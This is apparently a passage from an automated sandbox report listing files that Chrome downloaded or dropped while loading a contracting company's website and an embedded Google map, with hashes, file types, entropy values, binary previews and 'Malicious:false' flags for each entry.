                                              MD5:2D45EBA86D050FB444DB0F037C70AC0C
                                              SHA1:4382546BC05E00A9326151CE829D048AD6CEB16F
                                              SHA-256:A1AC7A50432594083812B7E94BBD409EC35510E889CC447A2B8DF630B68D9291
                                              SHA-512:2599D72338C9304F933F6FDF56B64CF224BFC7E507094F5C5B2AF707E11DBD37122EC318DFC3E121A37E3D1B90036A49A32300C2C5E809ED75D6BDC1F716870E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/27/18aa768db5c9e9a65a230d444ed505fd.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:MS Windows cursor resource - 1 icon, 32x32, 2 colors, hotspot @8x8
                                              Category:downloaded
                                              Size (bytes):326
                                              Entropy (8bit):2.5620714588910247
                                              Encrypted:false
                                              SSDEEP:6:Gl/0puls6M94pTiI+mBURd8EOJlZa8BBL:C0pqs6M94pTJyOZ77
                                              MD5:FEFF9159F56CB2069041D660B484EB07
                                              SHA1:0D0A08CF25A258511957F357B89D3908F3C5E6E3
                                              SHA-256:7342F390B12F636D14E25F698FC5E38CF6240994DC0C07FEFBBB4E78EC4D03C7
                                              SHA-512:F850277F48AC14FA363265469776E6F7F07F7DD743AA1D1AD7CF2329EEE6D323DA3422CF6BAAC066C84ECD24800A02088053EF3FC0488D170E7FC942AC8FFA99
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.gstatic.com/mapfiles/openhand_8_8.cur
                                              Preview:...... ......0.......(... ...@...............................................................................................................................?...w...g...............................................................................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                              Category:downloaded
                                              Size (bytes):15552
                                              Entropy (8bit):7.983966851275127
                                              Encrypted:false
                                              SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                              MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                              SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                              SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                              SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                              Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6032
                                              Entropy (8bit):7.9565436739834965
                                              Encrypted:false
                                              SSDEEP:96:VFo5xQ8vAjV4ozIMuMPPih+7kqJU25vaHK+qrI/8BTZ0OQjlzqA4cKhAcE5oom1:VFSxnsV1nuGL75JU2eqE/WTZUP4JvEed
                                              MD5:7D9A7D9F071E22A1BB998A3BB415F943
                                              SHA1:3F7333A3F807CA22C58F34F54E97894D9528A7F2
                                              SHA-256:8C1607ED026DDD2597553346594EA76E7B8CAA1183E2C42EE9F34E26A89FCEFD
                                              SHA-512:318FE7C881C5C1C3E6F4D118B13A59D47770AA6232A4160A46E58A051D78170C1E8580F5C3287A9035AA0185DB0B5A65FE1D5F99C6E7D6D163DE71C7B2FE49E1
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..........nRTSPRQ...............LNM......TVV....................v...WXX...................v`..............m.........GHG.......................}..........Q.................*+(GSV......Z[[..m.........S..[]UV..u..g...........SNT?IM.................565^^aTJH.....,.....r.q[...YSN...~zz........^v.MZb..=.....Z....7qqo#..@?<......gfcVlr...p.........x..l.......I.....?...............V..h...L..?k.......z].-...yV....Cc..u......)].{...../.E.....9t.p........|Sp.|...kIDATh..ko.Z...........%..a......A`..8....HC.D.L.$R+E..p...y....,..`g?{.w]66..s..%f....g7.L&..Z.a.K..G..b.V.&.".~.....\.(.....X.h^.......t^..t]U.....`...*...'.dK>..u.!...f.<....H{:.Tu]QTE.8.C1.G....n7..+.Z2..EO..D.. ..,B`.P......yJ.B.L...?..d2.p.Q.U..kn..J.+.b])..h..f.zH..2...@..Y.x...1A...H...."....vwZ...F,.....1.q\D....y..>:.F..ze.XSIx.>..<.....p8,.3.....'...l...V..d .z..+U......b.n$.....s..&\:.O..3.O.O..je*....b ..!.)6.~...e.X...W.F.P<......y..,..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3264
                                              Entropy (8bit):7.920271728606511
                                              Encrypted:false
                                              SSDEEP:48:Z/NuKfJH716Axc3CvFtSEsIEoY8356yLEEPib2AY+xeLz58qeN1rVpdMqfQw2uIe:t5h6UmCdQn5oEe9DAY5hO1rHKqff2G
                                              MD5:FD1D38BDF5AA692DCED62CCA08C7DE36
                                              SHA1:FBE73E7ABA5DEF05431BB0BC5AAECE4B3DC75ACA
                                              SHA-256:EE6DAD81326441809F5ED2C86DF9E8F779B060A75CE8D65BBBB44BD9DD66FD2B
                                              SHA-512:C0CC0D5EAC6F0861CD32C736734E13C1F3E6F3B4AA7728D3EAA9915DAD5DB2749A6F5F0381ED844A873EDAE07DD5242E90291974EF61193D4130AB2BA1D660DD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/faq.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE......9|.@s.Cp.............<w.1........"..)...........0.....Co.......)..Jj..........4y.>j.@_..........3z................<...........M]..........'..2..Z.........................2..z.....b..B........s..@..?..M.....Zp.\..$..........@..c..;.>.....IDATh..k......HD....&a..:...E@..N...;.V.v.L.9....Kq+V.g.U..0..?.....x5..&.K4.....I..n.A..}8[.&.q....=x...q....:M....B...d....,...U...)...P{LB.Q. ...I....N2Se&o..$...........;.z.`.t....-........7.}.v3..1w.....y...G..=>.7..d.R{.g..5...N.d...3.+.....w.........8:_....z....?..u...7.vX....2.....-.dw.<.0...G.Oo../.....}..]...o...wW...>.......t&..8.2.q.J..\^..;fw....)m..m...K.|7....;.I..-7...q...........g..F...y.Q....r.}............t4....5.R.88$..Na.....9..xN..u{.|D!.0r`.....}..F.m.........T.b...~...r...iH.k..c.....9...pGt.u.sp.&GB.q^..[..0v.^....>g.!2.!'r.rSo.blp.t.m6$.Z.t..) |..L...a..#..}.......;.H......vu...n(....5..v..n.........t.h}R.......!.p.d....>.pw.....+.........
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):7569
                                              Entropy (8bit):7.926954522048666
                                              Encrypted:false
                                              SSDEEP:192:EBm8ys8oUYcPhdg1Ko1J1BRbg8bfLO/F9:EBVydoVGwwShUyO3
                                              MD5:FBD583CE717AED4AB82F29A8F9F0ADAF
                                              SHA1:D6D65987A3A0B250B5F05C8AF6AD14301D69DB1E
                                              SHA-256:E0588ED878BC3EA6884CD9E8CD244A39638005D9CDEDA4E9CFF4B8AE63B4E864
                                              SHA-512:0D319FBD5946B1F30A0AC5E1B9A434592CCBDB718A38AC0140470F56BA031375A177BE5065827076822DAE28ED8F25E61F8379D99B1B0BCF9635D95D23D2D7AF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....p.T....tEXtSoftware.Adobe ImageReadyq.e<...AiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.0 (20230801.m.2265 3a00623) (Windows)" xmpMM:InstanceID="xmp.iid:ACF7431035E811EE9D71C58F3E9D5C90" xmpMM:DocumentID="xmp.did:ACF7431135E811EE9D71C58F3E9D5C90"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ACF7430E35E811EE9D71C58F3E9D5C90" stRef:documentID="xmp.did:ACF7430F35E811EE9D71C58F3E9D5C90"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>\J.U....IDATx..]..T.>wyU.]U.t7.4...#.kPA....8J".1.o&.3...}..bt.d.IF./..$&....%FbD.D.%.o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:MS Windows cursor resource - 1 icon, 32x32, 2 colors, hotspot @8x8
                                              Category:dropped
                                              Size (bytes):326
                                              Entropy (8bit):2.5620714588910247
                                              Encrypted:false
                                              SSDEEP:6:Gl/0puls6M94pTiI+mBURd8EOJlZa8BBL:C0pqs6M94pTJyOZ77
                                              MD5:FEFF9159F56CB2069041D660B484EB07
                                              SHA1:0D0A08CF25A258511957F357B89D3908F3C5E6E3
                                              SHA-256:7342F390B12F636D14E25F698FC5E38CF6240994DC0C07FEFBBB4E78EC4D03C7
                                              SHA-512:F850277F48AC14FA363265469776E6F7F07F7DD743AA1D1AD7CF2329EEE6D323DA3422CF6BAAC066C84ECD24800A02088053EF3FC0488D170E7FC942AC8FFA99
                                              Malicious:false
                                              Reputation:low
                                              Preview:...... ......0.......(... ...@...............................................................................................................................?...w...g...............................................................................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):3153
                                              Entropy (8bit):7.921231079798889
                                              Encrypted:false
                                              SSDEEP:96:vR1FgH9XUq0MyRDJaYzLjCPEJshJBWM9u:vR4HR0MyVMYCjJAM9u
                                              MD5:1CE45B6F43119F09E608842103797C72
                                              SHA1:563700070D78708BF89A0E85EB1156CB2D17B673
                                              SHA-256:5BB2C1FCC4894AF53A4477D019E72BEB6591ED3874D116BE4436BBC192DC7464
                                              SHA-512:E908FF642A8B043D7C0853F843D14C17F6F26E67FF928DD871C5851016C276B13349235739C649CD9F83814DC792F68D60368FCA52A1C5C4AEEB2F16AA2E49CD
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......,......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...PS.....=..Y.N....RQP\P.*...Z...@.I..Bk]h.,VxH...Z.Tp)O.......(....HH.Y.I0\BDt..7...0.s.Y....s...x.Ap..#...@..DA@..DA@....(....(...Q....Q....Q ... ... .DA@..DA@..D.(....(....(...Q....G..E".@.D..7...Y....^v.....r.H....TX..&. .x.X.R.S..H...o..&kw.|!.?.....%..@8 .R4..[...0\.v.N.s<".1PCMU.4.![$..i..~...-.Q^..3.:J.$...3.O..T.....?.(*|ys[..B.""...h.\O.u...D.Rs...K...~r...N.."....[a..:{......+.O..1...Yt..A../...k.*....nv~.'...z}...E8...Ovw...6.=..-m.N.~.jzY..~s....3{.#._.._K....<.E.T....G{..!...q|......:z.....*%Zr.....2.V;....f/&Jo....K.p.%.-]o......+xS.|..S9.;...#........t....Px0..C...d.]L...8.e..vR...+.'6...........Z.c{.....2#.P.8.N...%...Nqi..*..B.L...'.x..u.h..8QW....r.f}..j7....dE..D.|...........bKBuQ...P....:X.....8..[..J.-.!.Lv...|<a...-.Mq.U......S.N..o..(<.w.8..-...6l.]..E..2...]ll..`n.dc2.P............`c....Tg.....LF1K_f..J>..Y.....J....e....k.m[.K...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):16327
                                              Entropy (8bit):7.971538992036383
                                              Encrypted:false
                                              SSDEEP:384:K0wDGB7pzDVQAHcXE6x0bv1m9XFUN+n4ltmiF8u5AOfHq:KkpzDVQZXEi0r1IFUQ41auQ
                                              MD5:07157F5AA9BBE3EE788BB649BDECC32E
                                              SHA1:274445F8DF8931EFC8CF38182AA9DC7A837FEFF0
                                              SHA-256:E1ACF3C98893E9A077CD25B58F434F38743D5EC6BF0477D9A19489497A0880FB
                                              SHA-512:E02D72A2EC531E379B10E5ADC2B1BF3155D7DF62D327CF117CF993BB4D886DBE61F835EA83D193D4262C5D5B84B974E8C5388F884FBAFA1DBE27779582BF9BD9
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 109x109, segment length 16, baseline, precision 8, 1478x1105, components 3
                                              Category:dropped
                                              Size (bytes):183930
                                              Entropy (8bit):7.8697022648529575
                                              Encrypted:false
                                              SSDEEP:3072:StLkVDeXSgmGpNsrkBSTOelLM1+Gwk1TdfRfv0daS4EF30AkbT6dJ8UqynkKeg89:PVD7mxelLMJVpJFU3Vi278UlkKuvT53
                                              MD5:17D8EA21E60E2C55D556FF6CA4FFF398
                                              SHA1:AFE0294B128303110BE32298B4B18F095340B36C
                                              SHA-256:679B1A595BEDA8D1A866FF5882677FA3783072FE1379BE3B0D5308408CE951CE
                                              SHA-512:07CB6A3F3D47E54EF8D307E5C67C9D10FD34B76B306224FFA2C7CF3CA8CCE9B472772C560641502AEA8AFDEC95108EF3C2289111101B2D54AB6DD782AE3B6CCA
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.....m.m.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):18242
                                              Entropy (8bit):7.980590830519526
                                              Encrypted:false
                                              SSDEEP:384:Z14hJBM5u3E1+2ZfiluQyjNA+Pde5PI8t3+V0ce7/T5M9:shRb2hR5NA+4Bpm9
                                              MD5:FE13D641DE3736A1366E884DD2841819
                                              SHA1:999BB93BB6A7ECFB50CE9FBBBC829C8CFD72D6C9
                                              SHA-256:23560EB1D339222E5B57D3700004C7D2C7E4B6286BA627D47CC85412EF663FDC
                                              SHA-512:34810C45AC83F8D315304C192910889854B71D3CEDF4FE297357A175601EFE20A5B25C601607EA95A5CBC8B4E99629CE73EA851FE4B1CCE049456A2893022C82
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF:G..WEBPVP8L.G../..?.....m%.#3.:t.-a>....l"IV.(......x&>C...w.".v.........0.pD.......QBI....$`D.Mc......)...h...PB.%D.6.z.O.r}b?.q....).M.N...$...K.O....1..4...*..<.Z..6..W.....\.X..r.H..m.=..{t...lk..I.~...$ ...1...X.vVVWf..a ...."./Q..m..8E$."A..$..........."..i.8..%./q.?..k....#.T.(.....k...8N.......Y.j..N.......<)...W...9^......X.YV..xU.......a...U.s...k..$)/t...q/.S .^..9...Qdg.V.Yp+...|..E.......K.].!.....R..s..jGy..Ff.`...KX.#.....h.%.zu.........Uhof.s8.....{V.nz..g...S...l1...b.J.0.....X...<r....m.T....v...\$.<K..^...kn....Ef..^.n1./?..$X.y...*.X.t.MV:......ygE..^..\...R$........id..Ip.K..a........T....m..uVfm.u-..A..x.P.m-.w&....R...]g...v..7srdl;n&.g.e.#:_.<../3.>"D.C.[./*....(..sl.%..Z.bAy..x.f.)..F..G...".......L.."Ls'...FD5.2....GG.|UFg8.6.}....m.N..nlc.X..?+Ch...%[.uT..vw..l...~..Q.e...H.>.7...nK,..=..Q}..i.......n..sb..*6...G.,{X..D.6.=...}}............2W.?....%<.Z.!<74.....Q<.M9.!..;......W...&>|3...w.\.P9J.C.:.....r.XdjPl......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):15928
                                              Entropy (8bit):7.982598139347404
                                              Encrypted:false
                                              SSDEEP:384:VVdmp18SaP9hR0Grc2yBh9ZeTCkqePX2c9SR2YFdL+MzRABNrpzOYOptqk:5mpKSUhbon9YX29oYFdUNrpzOuk
                                              MD5:D04783F82F3FE40E55CC40188885BDC2
                                              SHA1:B9B1B1BAC64975EC944E42D7F917EE7559379611
                                              SHA-256:8C4A449A67537E22A9C39E99B308A450CADC017D21BD97E41607840A8F23E5A1
                                              SHA-512:6D1EB676822D72BBA0D48039A1AED22F43999E508B4B626FC7DA062EF0B1DE87EE718CD6C4D7A4957EC6501D8E86268EF136FC300DC841928CC750D7F7187823
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21414!3i14013!4i256!2m3!1e0!2sm!3i707457629!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=30533
                                              Preview:RIFF0>..WEBPVP8L#>../..?...m%.=...J...(.|..c..6...D..C..P........3.m+.{.w.NO.i.V,......?.P,..B......,#o..b..#P.U.Yx. .@.......h...U.R.@.T.....)..).J....3.?.."J.`.+.!Q.S.(...NiL"S*....$....Z..B...-.........._..}|2.d.?..Zn..C.....<....,. V..&L.A..Jf8:......F.;...c.....I.....D.HB..a..T.....t.rym..2.O...%...0...KD.!..T..3..1SD...J../Q..iw_...../f.......%.7..s.8$.J...I..8a.O..P.I/M....C3.T..hL...T.*..!"2E?E...8.M........'..!u...i..Q..)".L...(`:..h..I^..D....TA.aO..b.4...Wml..v.J....(N..G.LR$.,S4...`.T.NH).XS......f8..HS].Qk..K....r......8JC.....n.G..D.K...yyC........:....?........).....oY.......`.c.<.ZX.0....1.9.af..p...K.J..jq"2... .3.........Q=..p.....h^..k.....).OC>.0)G..q...Z.wjm.F....Rw..z.....7..1K.&..dlZMIP.S].4.m..vTo.h_.a.Jw..K.g...1....3..3.\C$1.4%.+q...4N.J..G.m.h.}._....U....T.....4.......R.}F.r.[b..YQv...+v..L....Kc ..x4..XE.N.R.F.`.*.$..m..4.4..2....../.u...1..A.8.,..6....2.3.......h.q.;.G....k..N;.w....u..M2C..At..G..1V.t.f.F.H
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):101415
                                              Entropy (8bit):7.973433675861473
                                              Encrypted:false
                                              SSDEEP:3072:TXNS7TzXyOrYwEJpBDW0Aw7PQ0waPzk3kBmomH6fXRiq2d7:azXyCYPM0Ps0nqkwoYN
                                              MD5:12E240ABC2238A9EA372538365F51958
                                              SHA1:A8D6521F55BA44F3FA5CF9704F6526A74DDF3C82
                                              SHA-256:8BB66F5D0222326382E775B3F0C4F567B4FDBA684493004D7E1A964EA6863A81
                                              SHA-512:8D97D35CF8A5AD5AEC49A27CA56404051BF10F16498A12B966E84F14D9D5FD49086BCCE283910AFBD55D5B6B80409EDF04F7BF7644D11FD491E21E3BC76126BE
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:CED80F76934211ED8222E6AEB029D772" xmpMM:DocumentID="xmp.did:CED80F77934211ED8222E6AEB029D772"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CED80F74934211ED8222E6AEB029D772" stRef:documentID="xmp.did:CED80F75934211ED8222E6AEB029D772"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............O....Q...%..........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:downloaded
                                              Size (bytes):130131
                                              Entropy (8bit):7.986258348139386
                                              Encrypted:false
                                              SSDEEP:3072:wrf3nezQubDlip2i1+Ill7AimCSoyS5xcpnqvkQ88GOCd5/0jef:SfuUUI2A+IHdxyPT8I5Mjef
                                              MD5:C789973E81975122A5FC0DC894524751
                                              SHA1:1230AA52D2C0C0109A1348ACF846654CDFF918AB
                                              SHA-256:22ACE61CEA8A960B8FD63D79770BC7640B40EEB2C8343D7DF25E6A781A6173BF
                                              SHA-512:3DC1ED643B36BDFC5D70E0837B8686966B0C4C3FF400FFBA7B7FDC73DF2007FF571B02CB0CAE85DF2AB27C096F21930CD6E21A7D44D7330B6AF8F75FF9EBE687
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/news/6/d7944471f1da95e5c78fcd38e3d0c93e.jpg
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."................................................|..5.y...&[Y.^......_...+.....s...wwwB.U{....,.y.Hu'....Ukb.{...'.kQ..7.G....-6.]Z..,.q..q.}_Ks_...z...(.j.fWU...?..~g.PC....3..9^...(c.]/O ....C.'..o".#...5...f.wK}}D.p@..h......Z.....Y...g..>.=t..pZ...z....#...&.U.)..h..w=$....o<...3.@.........UT....W.e..X...D.]9*.q.....|.L.^G..u...\&..._]..y....B.U.......<7.G6H......U3..;j...f"g.&.E.U^....qf. .~..<..........(..}...A.^V_.uF3....=..i....*H.......c\...s..sU.>..4...9........d}.1..*."5..ND.3u.......K-...1.......B{.f..<._........U.0>.1s.0U.,..E...>0:y...b"uY......V.U.k.bG..c.#.W@..g]B.9.....[.9.....*ZL.wv...>..l..<a.\.t4T......[a...$y@.....CO(..^.H..D...'9.....*.....c`3..[.t&.5Te...N......ihhS.&.......<3....3TW....c_...E.@4...9.&.....f.1.TNmYRr2^f.]\..a...0._...=..s[..@J....:.....7
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (535)
                                              Category:dropped
                                              Size (bytes):223898
                                              Entropy (8bit):5.569634545782144
                                              Encrypted:false
                                              SSDEEP:6144:31hPTuFlPJ038r+G7Po9fsDB+ymJlC+RaWlKvLnF6YNgHeYA+jaL5hCw/3m+:31hPTuFlPJ038J7Po9EDBgJlC+RaWlKP
                                              MD5:55B9B3B92484C1952379CFC8F20CF7F6
                                              SHA1:8E1546F3A1A88D4B8B1A95C36CAC634632D40ACC
                                              SHA-256:33D6BF90C2E77B7BD99DABD4D581B12B00FF0CA711B04210C73510CB87A730D3
                                              SHA-512:1697C222E294E0001AAF84B64229CB6929E9A8FC4158BF3233B5FABC2206C11B61254AD69E7476C7DDFAF812A49F9D010AC11D416BDE5197B6300069104D7852
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(_){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2019 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*..Math.uuid.js (v1.4).http://www.broofa.com.mailto:robert@broofa.com.Copyright (c) 2010 Robert Kieffer.Dual licensed under the MIT and GPL licenses..*/.var aaa,la,oa,na,ra,caa,daa,eaa,ib,kb,haa,naa,paa,nc,oc,pc,rc,uaa,yaa,zaa,xaa,Iaa,Gaa,Haa,Eaa,Daa,Faa,zd,Kaa,Laa,xd,Maa,Oaa,Naa,Paa,Qaa,Md,Raa,Saa,Vaa,Waa,Yaa,Zaa,fe,bba,Fe,fba,iba,cba,hba,gba,eba,dba,jba,nba,We,qba,cf,rba,vba,xba,yba,zba,Cba,wf,xf,yf,zf,Eba,Fba,Jba,Gba,Iba,Cf,Nf,Kba,Pf,Qf,Lba,Mba,Oba,Qba,Rba,Vba,Wba,Vf,Xba,Uba,Sba,Tba,Zba,Yba,Xf,bca,aca,cca,ag,dca,fca,gca,hca,kca,gg,ig,jg,ica,jca,nca,kg,lg,mg,oca,og,ng,pca,rca,tca,xca,zca,yca,Bca,Aca,Gca,Hca,Lca,Mca,Fi,Oca,Pca,Qca,Tca,Sca,Uca,Oi,.Rca,Vca,oj,uj,Kj,Lj,bda,Uj,eda,gda
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):108
                                              Entropy (8bit):5.06736806303502
                                              Encrypted:false
                                              SSDEEP:3:Dul214cndk1sQigmH10pKfikznWnoSC7+kuDKthUFCG9tJ:DuQ1tYsQijskgcbbCFFrJ
                                              MD5:AB000787D79B93B4EC0C3B5911156441
